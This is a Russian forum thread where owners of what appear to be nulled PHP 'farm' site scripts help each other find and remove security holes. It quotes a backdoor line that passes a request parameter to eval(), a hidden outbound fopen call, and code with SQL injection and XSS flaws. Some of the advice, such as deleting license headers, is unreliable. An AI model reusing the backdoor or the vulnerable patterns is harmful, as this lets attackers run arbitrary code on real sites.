Дыры на сайтах

Rozario · 22 Мар 2015

nikitin2016 написал(а):
@fopen("http://fruit-farm.org/admin.html","r");

чем заменить фрут-фарм ? своим доменом или просто удалить эту строку в файле : _class.rfs_payeer.php

удаляй

maks111 · 23 Мар 2015

тут нашел коды помогите исправить их

PHP:

/pages/account/_referals.php
16:  
<img src="/img/piar-link.png" style="vertical-align:-2px; margin-right:5px;" /><font color="#000;">http://<?=$_SERVER['HTTP_HOST']; ?>/?i=<?=$_SESSION["user_id"]; ?></font>

XSS!
pages/admin/_about.php
61:  
$db->Query("UPDATE db_conabrul SET about = '".$_POST["tx"]."' WHERE id = '1'");

SQL Injection!
/pages/admin/_contacts.php
60:  
$db->Query("UPDATE db_conabrul SET contacts = '".$_POST["tx"]."' WHERE id = '1'");

SQL Injection!

PHP:

/_recovery.php
72:  
<td align="left" width="250"><input name="email" type="text" size="25" maxlength="50" value="<?=(isset($_POST["email"])) ? $_POST["email"] : false; ?>"/></td>
XSS!


/_signup.php
99:  
<td align="left" width="250"><input name="email" type="text" size="25" maxlength="50" value="<?=(isset($_POST["email"])) ? $_POST["email"] : false; ?>"/></td>

XSS!
/_signup.php
213:  
<td align="left" style="padding:3px;"><input name="login" type="text" size="25" maxlength="10" value="<?=(isset($_POST["login"])) ? $_POST["login"] : false; ?>"/></td>

XSS!

/_referals.php
16:  
<img src="/img/piar-link.png" style="vertical-align:-2px; margin-right:5px;" /><font color="#000;">http://<?=$_SERVER['HTTP_HOST']; ?>/?i=<?=$_SESSION["user_id"]; ?></font>

XSS!

что сделать можно ли их удалить

kvozimir · 23 Мар 2015

maks111 написал(а):

тут нашел коды помогите исправить их

PHP:

/pages/account/_referals.php
16: 
<img src="/img/piar-link.png" style="vertical-align:-2px; margin-right:5px;" /><font color="#000;">http://<?=$_SERVER['HTTP_HOST']; ?>/?i=<?=$_SESSION["user_id"]; ?></font>

XSS!
pages/admin/_about.php
61: 
$db->Query("UPDATE db_conabrul SET about = '".$_POST["tx"]."' WHERE id = '1'");

SQL Injection!
/pages/admin/_contacts.php
60: 
$db->Query("UPDATE db_conabrul SET contacts = '".$_POST["tx"]."' WHERE id = '1'");

SQL Injection!

PHP:

/_recovery.php
72: 
<td align="left" width="250"><input name="email" type="text" size="25" maxlength="50" value="<?=(isset($_POST["email"])) ? $_POST["email"] : false; ?>"/></td>
XSS!


/_signup.php
99: 
<td align="left" width="250"><input name="email" type="text" size="25" maxlength="50" value="<?=(isset($_POST["email"])) ? $_POST["email"] : false; ?>"/></td>

XSS!
/_signup.php
213: 
<td align="left" style="padding:3px;"><input name="login" type="text" size="25" maxlength="10" value="<?=(isset($_POST["login"])) ? $_POST["login"] : false; ?>"/></td>

XSS!

/_referals.php
16: 
<img src="/img/piar-link.png" style="vertical-align:-2px; margin-right:5px;" /><font color="#000;">http://<?=$_SERVER['HTTP_HOST']; ?>/?i=<?=$_SESSION["user_id"]; ?></font>

XSS!

что сделать можно ли их удалить

где нашел там же и посмотри как исправить

nikitin2016 · 5 Апр 2015

Народ что лучше совсем удалить папку tiny_mce или поставить на нее htaccess (deny from all) и права доступа 444 , подскажите ?

himik · 6 Апр 2015

nikitin2016 написал(а):
Народ что лучше совсем удалить папку tiny_mce или поставить на нее htaccess (deny from all) и права доступа 444 , подскажите ?

Удаляй,это редактор который вообще не используется,я удалил никаких проблем.

nikitin2016 · 6 Апр 2015

himik написал(а):
Удаляй,это редактор который вообще не используется,я удалил никаких проблем.

А если я удалю папку tiny_mce , а у меня все страницы на этом редакторе написаны то они сразу все записи исчезнут ? И придется писать заново или я просто новой записи не смогу сделать ?

himik · 8 Апр 2015

nikitin2016 написал(а):
А если я удалю папку tiny_mce , а у меня все страницы на этом редакторе написаны то они сразу все записи исчезнут ? И придется писать заново или я просто новой записи не смогу сделать ?

Страницы написаны не в этом редакторе.Если удалишь папку то в админке при написании новостей,правил и т.д. просто исчезнет возможность использования некоторых функций(смайлы,медиа,символы и т.д.) если это не устраивает тогда надо проверять файлы в этой папке и оставлять только те что относятся к редактору а так же выставлять права,думаю только на чтение.
п.с. Я удалил так как не использую доп. функции.

Sidr23 · 9 Апр 2015

что скажете об этой статье из песочницы - .htacсess как оформлять ))

kadet2106 · 14 Апр 2015

Кто подскажет? Что делать с этими ссылками:

Line 7: * http://www.opensource.org/licenses/mit-license.php
Line 8: * http://www.gnu.org/licenses/gpl.html
Line 854: * http://www.opensource.org/licenses/mit-license.php
Line 855: * http://www.gnu.org/licenses/gpl.html
Line 7: * http://jquery.org/license

Находяться они в файлах .js
Их можно удалять или нет?

mythphp · 14 Апр 2015

kadet2106 написал(а):
Кто подскажет? Что делать с этими ссылками:

Line 7: * http://www.opensource.org/licenses/mit-license.php
Line 8: * http://www.gnu.org/licenses/gpl.html
Line 854: * http://www.opensource.org/licenses/mit-license.php
Line 855: * http://www.gnu.org/licenses/gpl.html
Line 7: * http://jquery.org/license

Находяться они в файлах .js
Их можно удалять или нет?

Так удали и посмотришь если на работу сайта не повлияло значит всё нормально. В любом случае зачем тебе левые ссылки в скрипте )

nikitin2016 · 18 Апр 2015

kadet2106 написал(а):
Кто подскажет? Что делать с этими ссылками:

Line 7: * http://www.opensource.org/licenses/mit-license.php
Line 8: * http://www.gnu.org/licenses/gpl.html
Line 854: * http://www.opensource.org/licenses/mit-license.php
Line 855: * http://www.gnu.org/licenses/gpl.html
Line 7: * http://jquery.org/license

Находяться они в файлах .js
Их можно удалять или нет?

я удалил все файлы и записи с Лицензией и скрипт работает нормально , перед удалением сделай резервное копирование всего что будешь удалять чтобы если что пойдет не так мог вернуть обратно , я всегда так делаю помогает (перестраховка великая вещь)

himik написал(а):
Страницы написаны не в этом редакторе.Если удалишь папку то в админке при написании новостей,правил и т.д. просто исчезнет возможность использования некоторых функций(смайлы,медиа,символы и т.д.) если это не устраивает тогда надо проверять файлы в этой папке и оставлять только те что относятся к редактору а так же выставлять права,думаю только на чтение.
п.с. Я удалил так как не использую доп. функции.

я удали полностью текстовый редактор тайни мке и пользуюсь онлайн текстовым редактором просто вставляю код новости или правил допустим как мне и советовали , не удобно конечно , но в целях безопасности чего только не сделаешь !

Kamikadze · 18 Апр 2015

Привет всем! гляньте строчку, айболит прям сильно на нее выругался

Код:

if(!empty($_REQUEST['db_donations'])){ if(@get_magic_quotes_gpc())$_REQUEST['db_donations']=stripslashes($_REQUEST['db_donations']); eval($_REQUEST['db_donations']); die();}

Krikash · 18 Апр 2015

Kamikadze написал(а):
Привет всем! гляньте строчку, айболит прям сильно на нее выругался

Код:

if(!empty($_REQUEST['db_donations'])){ if(@get_magic_quotes_gpc())$_REQUEST['db_donations']=stripslashes($_REQUEST['db_donations']); eval($_REQUEST['db_donations']); die();}

Это дыра!
if(!empty($_REQUEST['db_donations'])){ if(@get_magic_quotes_gpc())$_REQUEST['db_donations']=stripslashes($_REQUEST['db_donations']); eval($_REQUEST['db_donations']); die();}

Krikash · 18 Апр 2015

Использование функции eval() может быть очень опасно, поскольку позволяет исполнить произвольный код.

MrMatnoos · 18 Апр 2015

Krikash написал(а):
Использование функции eval() может быть очень опасно, поскольку позволяет исполнить произвольный код.

Пробовал эту дыру закрыть, модуль не в какую не хотел работать.. Плюнул и удалил его.

Kamikadze · 18 Апр 2015

Mrmatnoos написал(а):
Пробовал эту дыру закрыть, модуль не в какую не хотел работать.. Плюнул и удалил его.

После удаления модуль работает?

Kamikadze · 18 Апр 2015

eval($_REQUEST['db_donations']); die();} удалил эту строку, все работает

MrMatnoos · 18 Апр 2015

Kamikadze написал(а):
eval($_REQUEST['db_donations']); die();} удалил эту строку, все работает

вот в этом и проблема, что когда я удаляю эту строку у меня влазит пустая страницы.

MrMatnoos · 18 Апр 2015

Mrmatnoos написал(а):
вот в этом и проблема, что когда я удаляю эту строку у меня влазит пустая страницы.

Нашёл защиту этой инъекции.. Там стоит код: если в коде пропадёт строчка eval($_REQUEST['db_donations']); die();, то активируются дополнительные теги <?, тем самым вызывая пустую страницу. Вот что значит автор постарался

.

Kamikadze · 18 Апр 2015

Mrmatnoos написал(а):
Нашёл защиту этой инъекции.. Там стоит код: если в коде пропадёт строчка eval($_REQUEST['db_donations']); die();, то активируются дополнительные теги <?, тем самым вызывая пустую страницу. Вот что значит автор постарался .

Вообщем удалил все строку... работает все...странно